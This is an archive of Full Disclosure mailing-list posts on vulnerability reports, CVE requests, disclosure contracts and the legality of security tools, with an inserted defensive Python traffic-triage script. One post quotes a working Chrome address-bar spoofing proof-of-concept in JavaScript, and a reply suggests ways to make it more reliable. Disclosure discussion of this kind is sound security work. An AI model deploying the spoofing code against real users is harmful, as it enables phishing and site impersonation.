[FD] Multiple vulnerabilities discovered in Qualys Cloud Agent

2022-09-12 Thread Daniel Wood via Fulldisclosure
The Unqork Security team discovered multiple security vulnerabilities in
the Qualys Cloud Agent, including arbitrary code execution.

CVE-2022-29549 (Arbitrary Code Execution)
https://nvd.nist.gov/vuln/detail/CVE-2022-29549

CVE-2022-29550 (Sensitive Information Disclosure)
https://nvd.nist.gov/vuln/detail/CVE-2022-29550

Read more:
https://www.unqork.com/resources/unqork-and-qualys-partner-to-resolve-zero-day-vulnerabilities
https://blog.qualys.com/product-tech/2022/08/15/qualys-security-updates-cloud-agent-for-linux

Daniel Wood
Head of Product Security, Unqork

-- 
**This e-mail, and any attachments thereto, is intended only for use by the 
addressee(s) named herein and may contain legally privileged and/or 
confidential information. If you are not the intended recipient of this 
e-mail, you are hereby notified that any dissemination, distribution or 
copying of this e-mail, and any attachments thereto, is strictly 
prohibited. If you have received this e-mail in error, please notify me by 
replying to this message and permanently delete the original and any copy 
of this e-mail and any printout thereof.**
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Re: [FD] 360 security android app snoops data to China Unicom network via insecure HTTP

2017-05-04 Thread Daniel Wood
Can't you just run the app in an Android emulator and shark it?

Sent from my iPhone

> On Apr 30, 2017, at 06:02, secli...@email.tg wrote:
> 
> I have a further update on the issue. After uninstalling the 360 security 
> android app, I found after repeated checks of Network Info on my phone via 
> the Ping & DNS app that even then the HTTP connection to IP address 
> 123.125.114.8 still frequently showed up. So, I monitored the network 
> connections on my phone via the Network Connections app 
> (https://play.google.com/store/apps/details?id=com.antispycell.connmonitor) 
> and found that this time the HTTP connection to IP address 123.125.114.8 was 
> being established by the ES File Explorer app 
> (https://play.google.com/store/apps/details?id=com.estrongs.android.pop 
> (https://play.google.com/store/apps/details?id=com.estrongs.android.pop)). 
> So, it is possible that the insecure HTTP connection to the above IP address 
> that I observed when both the 360 security and ES File Explorer app were 
> installed on my phone was in fact because of the ES File Explorer app or the 
> other possibility is that both the apps have the same problem. I haven't had 
> a chance to re-install the 360 security app without the ES File Explorer to check 
> that and I don't intend to re-install the 360 security app on my phone, since 
> it anyways used to raise the temperature on my phone suspiciously. So, I will 
> report this as an issue for the ES File Explorer app in a separate email.
> 
> Thanks.
> Hi,
> 
> I found the following review posted about the 360 security android app:
> 
> https://play.google.com/store/apps/details?id=com.qihoo.security=Z3A6QU9xcFRPSG1HSTRaSVdNelVWY3FhZk5zcFlFMnZKeXRKRHhhQUE4VU9pLWV4UFBxeHJ3Xy1ZZWU2bEpOLTg0eGxzczFCV0lkaWxxTHRzZTQ4RWxzU2c
>  
> (https://play.google.com/store/apps/details?id=com.qihoo.security=Z3A6QU9xcFRPSG1HSTRaSVdNelVWY3FhZk5zcFlFMnZKeXRKRHhhQUE4VU9pLWV4UFBxeHJ3Xy1ZZWU2bEpOLTg0eGxzczFCV0lkaWxxTHRzZTQ4RWxzU2c)
> "Snoops data to China Unicom via insecure HTTP link! Found while checking 
> Network info on my device with this app installed that it had established an 
> insecure HTTP connection to an IP address(123.125.114.8) on Chinese state 
> owned China Unicom network (China Unicom owns a stake in app developer via 
> Qihoo 360). Also, when installed, found my phone temperature rising 
> frequently indicating covert data transfer from my phone. I've now 
> uninstalled this Chinese spying app & advice the same to anyone using the 
> app. Resp to comment: updated above info with IP addr.  
> 360 Mobile Security Limited April 26, 2017  Hi, sorry for the inconvenience. 
> It will be helpful for us to solve the problem, if you can give us more 
> information and details . Attaching some screenshots would be helpful. Please 
> contact us by email: je...@mobimagic.com (mailto:je...@mobimagic.com). Many 
> thanks."
> 
> I observed the same behavior when I had this app installed on my smartphone. 
> I checked the Network Info on my phone when this app was installed, using the 
> Ping & DNS 
> app(https://play.google.com/store/apps/details?id=com.ulfdittmer.android.ping 
> (https://play.google.com/store/apps/details?id=com.ulfdittmer.android.ping)) 
> and found the insecure HTTP connection to the above IP address. After I 
> uninstalled the app, the HTTP connection to the above IP address was gone, as 
> well. On checking the WHOIS info(https://www.whois.com/whois/123.125.114.8 
> (https://www.whois.com/whois/123.125.114.8)) for this IP address it can be 
> seen that it is indeed on the Chinese state-owned China Unicom network. I had 
> App usage tracking permission on Android enabled for this app, to facilitate 
> phone temperature reduction, when I observed the above.
> 
> Can other security researchers please check and comment on this security hole?
> 
> Thanks.
> 

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
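Daniel's suggestion above is to run the app in an emulator and capture its traffic. What follows the capture is the triage step, shown here as an added example that is not part of the thread or of any of the apps it discusses. The script takes the first client payload of each TCP flow (the sample flows are constructed, including a cleartext GET to 123.125.114.8 as described in the thread, a TLS ClientHello, a request to a private address, and an unrecognised binary protocol), classifies each as cleartext HTTP, TLS, or unknown, pulls the request line and Host header out of the cleartext ones, and flags cleartext HTTP to a globally routable destination. Obtaining the flows (for example with the Android emulator's capture option or Wireshark, as "shark it" implies) and mapping a flow back to the app that opened it are assumed to be done separately; the payload format is the only thing this code relies on.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample flows: (source, destination, dst port, first bytes the
# client sent). Illustrative only; not captured from the apps in the thread.
SAMPLE_FLOWS = [
    ("10.0.2.15", "123.125.114.8", 80,
     b"GET /update/check?ver=3.2 HTTP/1.1\r\nHost: 123.125.114.8\r\n"
     b"User-Agent: Dalvik/2.1.0\r\n\r\n"),
    ("10.0.2.15", "93.184.216.34", 443,
     b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03" + b"\x00" * 32),
    ("10.0.2.15", "192.168.1.20", 80,
     b"POST /api/v1/sync HTTP/1.1\r\nHost: nas.local\r\nContent-Length: 2\r\n\r\n{}"),
    ("10.0.2.15", "203.0.113.9", 8080,
     b"\x00\x01\x02binaryproto"),
]

HTTP_METHODS = (b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"OPTIONS", b"PATCH", b"CONNECT")
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/1\.[01]\r\n")


@dataclass
class FlowVerdict:
    src: str
    dst: str
    dport: int
    proto: str            # "http", "tls" or "unknown"
    external: bool        # destination is globally routable (not RFC 1918, loopback, etc.)
    method: Optional[str] = None
    path: Optional[str] = None
    host: Optional[str] = None


def classify_payload(payload: bytes) -> str:
    """Classify the first client payload of a TCP flow.

    A TLS record starts with content type 0x16 (handshake) and a 0x03 major
    version byte; a cleartext HTTP request starts with a method token and a
    well-formed request line. Anything else is reported as unknown.
    """
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03:
        return "tls"
    if payload.startswith(HTTP_METHODS) and REQUEST_LINE.match(payload):
        return "http"
    return "unknown"


def parse_http_request(payload: bytes):
    """Return (method, path, host) from a cleartext HTTP request; host may be None."""
    m = REQUEST_LINE.match(payload)
    if not m:
        return None, None, None
    head, _, _ = payload.partition(b"\r\n\r\n")
    host = None
    for line in head.split(b"\r\n")[1:]:          # skip the request line itself
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            host = value.strip().decode("ascii", "replace")
            break
    return m.group(1).decode("ascii"), m.group(2).decode("ascii", "replace"), host


def is_external(addr: str) -> bool:
    # is_global is False for private, loopback, link-local and documentation ranges.
    return ipaddress.ip_address(addr).is_global


def triage(flows) -> List[FlowVerdict]:
    verdicts = []
    for src, dst, dport, payload in flows:
        proto = classify_payload(payload)
        v = FlowVerdict(src, dst, dport, proto, is_external(dst))
        if proto == "http":
            v.method, v.path, v.host = parse_http_request(payload)
        verdicts.append(v)
    return verdicts


def cleartext_to_external(flows) -> List[FlowVerdict]:
    """The condition the thread reports: cleartext HTTP leaving the device for a public host."""
    return [v for v in triage(flows) if v.proto == "http" and v.external]


if __name__ == "__main__":
    for v in triage(SAMPLE_FLOWS):
        flag = "CLEARTEXT-EXTERNAL" if v.proto == "http" and v.external else ""
        print(f"{v.src} -> {v.dst}:{v.dport} {v.proto:7} host={v.host} "
              f"{v.method or ''} {v.path or ''} {flag}")
```

Classifying on the first payload rather than on the port is deliberate: an app that speaks cleartext HTTP on 8080 or TLS on 80 would be misreported by a port-based check, and the Host header, not the destination IP, is what tells you which service the app thinks it is talking to.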


Re: [FD] Google Chrome Address Spoofing (Request For Comment)

2015-07-03 Thread Daniel Wood
Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69) 
with Safari.

DW
Sent from my iPad

 On Jul 2, 2015, at 9:33 AM, Mustafa Al-Bassam <m...@musalbas.com> wrote:
 
 That's pretty neat. Played around with this and made a few discoveries.
 
 1. It shows a valid certificate when you spoof HTTPS sites. That's really 
 bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc
 
 2. The page isn't responsive when using this flaw. That means you can't spoof 
 a login box for example. (I tried.)
 
 3. The success of the exploit seems to depend on if the browser can start 
 loading content.html fast enough. I noticed that the exploit works 100% of 
 the time when used locally. Perhaps a better version of the exploit would 
 somehow preload content.html - for example by opening a window with an URL 
 that starts with javascript: followed by a script to display the content? 
 That, or perhaps reducing the interval time for trying to run next() after 
 the popup is created.
 
 I wonder if this works on any other browsers?
 
 Mustafa
 
 On 30 Jun 2015 7:08 am, David Leo <david@deusen.co.uk> wrote:
 
 Impact: 
 The click to verify thing is completely broken... 
 Anyone can be BBB Accredited Business etc. 
 You can make whitehouse.gov display We love Islamic State :-) 
 
 Note: 
 No user interaction on the fake page. 
 
 Code: 
 * index.html 
 <script> 
 // Keep replacing the popup's location with a varying query string so the
 // address bar shows the oracle.com URL while content.html stays on screen.
 function next() 
 { 
 w.location.replace('http://www.oracle.com/index.html?'+n);n++; 
 setTimeout("next();",15); 
 setTimeout("next();",25); 
 } 
 function f() 
 { 
 w=window.open("content.html","_blank","width=500 height=500"); 
 // Poll until the popup has become cross-origin (reading w.location.href throws), then start next(). 
 i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); 
 } 
 </script> 
 <a href="#" onclick="f()">Go</a><br> 
 * content.html 
 <b>This web page is NOT oracle.com</b> 
 <script>location="http://www.oracle.com/index.html";</script> 
 * It's online 
 http://www.deusen.co.uk/items/gwhere.6128645971389012/ 
 (The page says June/16/2015 - it works as we tested today) 
 
 Request For Comment: 
 We reported this to Google. 
 They reproduced, and say 
 It's DoS which doesn't matter. 
 We think it's very strange, 
 since the browser does not crash(not DoS), 
 and the threat is obvious. 
 What's your opinion? 
 
 Kind Regards, 
 
 PS 
 We love clever tricks. 
 We love this: 
 http://dieyu.org/ 
 
 

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Re: [FD] Regarding how can I request a CVE number?

2015-03-19 Thread Daniel Wood
Unfortunately, this has been happening to many people within the last year. 

My suggestion is to assign your own numbering schema to them and post the 
details. If they gain momentum then you may get one assigned anyway if it's 
serious enough. 

Sent from my iPhone

 On Mar 18, 2015, at 6:32 AM, James Hooker <seidrhr...@googlemail.com> wrote:
 
 Hi XZ,
 
 I managed to get a number of CVEs last year, but towards the end of the
 year they simply stopped replying, so I've given up. Whether they stopped
 replying due to work load, or whether my submissions were not up to their
 requirements I'm not sure.
 
 If you find out any more, I'd be interested in knowing why they've stopped
 assigning CVEs to certain submission sources.
 
 Kind regards,
 James H
 
 On Tue, Mar 17, 2015 at 11:25 PM, XiaopengZhang <tfr...@yeah.net> wrote:
 
 Hi Guys,
 
 I discovered several Vuls and have reported them to the vendors, so I'd
 like to request the CVE for them.(The vendor did not want to request CVE)
 
 I have sent some emails to cve-ass...@mitre.org applying for CVEs.
 But so far nobody has replied to them. I don't know what happened with this
 email box.
 Is my email recognised as spam? Or do I need to write the email content in a
 special format?
 
 So please, can somebody here help me?
 Thanks
 
 Best wishes,
 XZ
 

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Re: [FD] Responsible disclosure: terms and conditions

2014-06-09 Thread Daniel Wood
Should also point out that getting EO insurance is a good idea. 

Daniel

 On Jun 8, 2014, at 1:34 PM, Dave Warren <da...@hireahit.com> wrote:
 
 On 2014-06-08 04:03, Paul Vixie wrote:
 this is concerning, for two reasons.
 
 first, for enforceability, a contract requires exchange of
 consideration. what's yours? i can see that the vendor is receiving
 something of value (the disclosure) but it's not clear what you're
 getting in return beyond the opportunity to have your good deeds go
 unpunished. absence of a negative does not amount to a positive in the
 eyes of the law.
 
 Indemnity is definitely consideration. I'm not sure that "1- You will not 
 attempt to threaten or prosecute the researcher in any jurisdiction." is 
 sufficient though, but something similar in appropriate legalese would 
 possibly do the trick.
 
 There also needs to be an enforcement or penalty clause that is mutually 
 agreeable (and this is probably where most companies will start to wonder if 
 agreeing is worthwhile). A contract without an enforcement clause is mostly 
 useless since a violation will, at most, allow the opposing party to 
 disregard the contract. This works great in an "I will mow your lawn as needed 
 for $80/week" contract, in which case in the event of a breach, the other 
 party would stop complying with their terms.
 
 In this case, the vendor has an ongoing obligation to not sue, whereas the 
 researcher has completed their portion as soon as they reveal the information 
 to the company (or as soon as they complete a defined responsible disclosure 
 period). If the company chooses to pursue legal action against the 
 researcher, the researcher has no remedy in the contract.
 
 At a minimum, agreeing to limit damages in the event of any and all legal 
 actions resulting from researching and disclosing the vulnerability would be 
 a start.
 
 Still, I like the idea, especially if it's something that a reasonable number 
 of researchers use.
 
 -- 
 Dave Warren
 http://www.hireahit.com/
 http://ca.linkedin.com/in/davejwarren
 
 
 

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Re: [FD] Responsible disclosure: terms and conditions

2014-06-08 Thread Daniel Wood
Keep in mind you can always be sued. No matter what 'legal' document you may 
have. I'm the third down on that attrition list. 

This brings to mind this recent blog from John Strand: 
http://pen-testing.sans.org/blog/pen-testing/2014/06/04/five-things-every-pen-tester-should-know-about-working-with-lawyers

Not specifically regarding disclosure but worth the read. 

Daniel

 On Jun 8, 2014, at 7:03 AM, Paul Vixie <p...@redbarn.org> wrote:
 
 
 
 Pedro Ribeiro wrote:
 ...
 
 I am not a lawyer, so I would like everyone's opinion (lawyer or not)
 on whether this would actually provide any protection.
 
 i am not a lawyer either. i started MAPS, the first anti-spam company,
 in 1997 or so, and became the most-sued person i know. i may be the
 most-sued person you'll ever know. and i've been sued by some experts. so:
 
 I had this idea of making Terms & Conditions that you would send to a
 vendor prior to disclosing the vulnerabilities. The vendor (or someone
 responsible) would have to accept these terms by replying to your
 email and only then you would reveal the vulnerabilities. If they
 didn't accept, you would release them to the public (full disclosure)
 immediately.
 
 this is concerning, for two reasons.
 
 first, for enforceability, a contract requires exchange of
 consideration. what's yours? i can see that the vendor is receiving
 something of value (the disclosure) but it's not clear what you're
 getting in return beyond the opportunity to have your good deeds go
 unpunished. absence of a negative does not amount to a positive in the
 eyes of the law.
 
 you're also treating this as a one-off. i suggest you make it
 continuous, and make continuity be a value they are trading for. so,
 make this a relatively standard bilateral NDA stating the violation by
 them will result in (a) cancellation of the NDA, (b) unwillingness by
 you to enter into another NDA with them for three years, and (c) naming
 and shaming them for who they are and what they did, over on slashdot.
 
 it's generally good text other than these structural matters. you'll
 want a real lawyer to look at it before you try to use it, and maybe
 before you process my suggestion above. we have two non-practicing
 lawyers in the computer security field, david dagon and anne mitchell.
 let me know if you'd like an introduction to either.
 
 vixie
 

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Re: [FD] So You Like Pain and Vulnerability Management? New Article.

2014-05-14 Thread Daniel Wood
Pedro,

I think you misinterpreted the article. I can see how his writing style can be 
confusing with all the joking and contradictions throughout. I had to reread it 
twice to make sure I was taking away what was intended. 

Just to be clear though, I agree and don't think it really adds value for those 
of us that already do vulnerability management; however, if written more clearly, 
I could see this being beneficial to those that don't understand VM and help 
drive away the misconception that VM is just patching and will make you secure. 

One thing I would like to see us get away from as a community is siloing VM as 
something special. I think we need to be more holistic and include threats 
(TVM) as part of the larger picture. Doing so increases your VM ROI and actually 
gets you closer to a more secure baseline, as you can select appropriate 
controls (caveat: if done properly). 

Daniel

 On May 13, 2014, at 5:40 AM, Pedro Ribeiro <ped...@gmail.com> wrote:
 
 On 12 May 2014 19:48, Pete Herzog <li...@isecom.org> wrote:
 
 Hi, I’m your friend and security researcher, Pete Herzog. You might
 know me from other public service announcements such as the widely
 anticipated, upcoming workshop Secrets of Security, and critic’s
 choice award winners: Teaching Your Teen to Hack Police Cars, and
 Help! My Monkey is Posting Pictures to Facebook!
 
 But I’m here today to take a moment and talk to you about the pain of
 neglect, isolation, abuse, and infection, better known as
 “vulnerability management”. In many ways vulnerability management can
 be part of a healthy system and over-all good security. But there’s
 many important differences between vulnerability management and
 security that you should know about:
 
 That's how my new article starts. 5 points on the pain of
 vulnerability management and how to make it hurt less. It's posted
 here:
 
 
 http://www.tripwire.com/state-of-security/vulnerability-management/so-you-like-pain-and-vulnerability-management/
 
 
 Feel free to discuss with me on Twitter @peteherzog and #securitypain
 and #helpmymonkeyispostingpicturestofacebook ;)
 
 Sincerely,
 -pete.
 
 --
 Pete Herzog - Managing Director - p...@isecom.org
 
 Hi,
 
 I fail to see the point of the article and I think you are making some
 major assumptions here while at the same time stating the obvious.
 
 First, who is the audience of the article? As a vulnerability manager
 myself I find it insulting that you think that I don't know that finding
 vulnerabilities by itself without ANY other security controls will make my
 employer secure.
 
 Secondly, you are saying that vulnerability management = scanning
 something with a vulnerability scanner, reviewing the output and patching. As it
 says on Wikipedia, it is much more than that - it is the cyclical practice
 of identifying, classifying, remediating, and mitigating vulnerabilities
 [¹].
 So at the very least I would define it as identifying possible
 vulnerabilities with various tools - scanners, internal and external
 pentests, source code review, fuzzing, bug reports, etc - and managing
 their life cycle to the end by either patching, putting a control in place
 or even signing it off as an acceptable risk.
 
 Also you seem to focus solely on the problem of patching closed source
 software. But nowadays most of the attacks are done via the Web layer, and
 in most companies the Web layer is developed in house. So you can much more
 effectively find vulnerabilities with a source code review than just
 patching them as they appear.
 
 As the article seems to imply, vulnerability management is about reducing
 the risk and the overall attack surface. But I thought this was common
 knowledge, especially among people who consider themselves vulnerability
 managers?
 
 Regards
 Pedro
 
 [¹] http://en.m.wikipedia.org/wiki/Vulnerability_management
 

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Legality of Open Source Tools

2014-04-07 Thread Daniel Wood
Toni,

The English version has this information in Chapter 38; I didn't find it in 
Chapter 34. 

The key to all this is the language of intent, using verbiage such as 
"aggravated", "unlawful", and "to cause detriment". This is the same as in the 
United States and many other countries; if you don't have the intention to 
cause harm, it can be argued as a lack of 'mens rea', which is Latin for "guilty 
mind". In order for it to be considered a crime (legally speaking, at least in 
the United States) you need that key component along with the actual act of 
committing the crime (known as 'actus reus'). 

I'm not saying that Finland or any other country is the same as the United 
States, but having studied Criminal Law, I do know that many countries have 
similar code on the books.

If you're truly concerned, I would write or speak to your court representative 
for clarification. 

Daniel

 On Apr 5, 2014, at 6:23 AM, Toni Korpela <ad...@xorfork.com> wrote:
 
 Greetings from Finland.
 
 I know that here it is illegal to import, manufacture, sell
 or otherwise distribute such machine or software which
 are designed to endanger or harm information and
 communication systems.
 
 This is stated in chapter 34 § 9a. Then again, § 9b states
 that it is illegal to possess a machine, software or access
 information for systems which you can use to endanger
 or harm information and communication
 systems.
 
 Basically this means that I am not allowed to have ping,
 nmap or other networking / penetration testing tools
 which can be used for harm installed on my computer.
 Though I am not certain if any of these computer
 security laws have been used to penalize someone.
 
 I am not certain if penetration testing tools belong to
 the category of tools which are designed to endanger
 or harm information and communication systems.
 
 It's quite harsh if I could get fines or a maximum of 2 years in jail
 for having a Linux distribution with some networking tools
 installed on my computer.
 
 -Toni
 

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/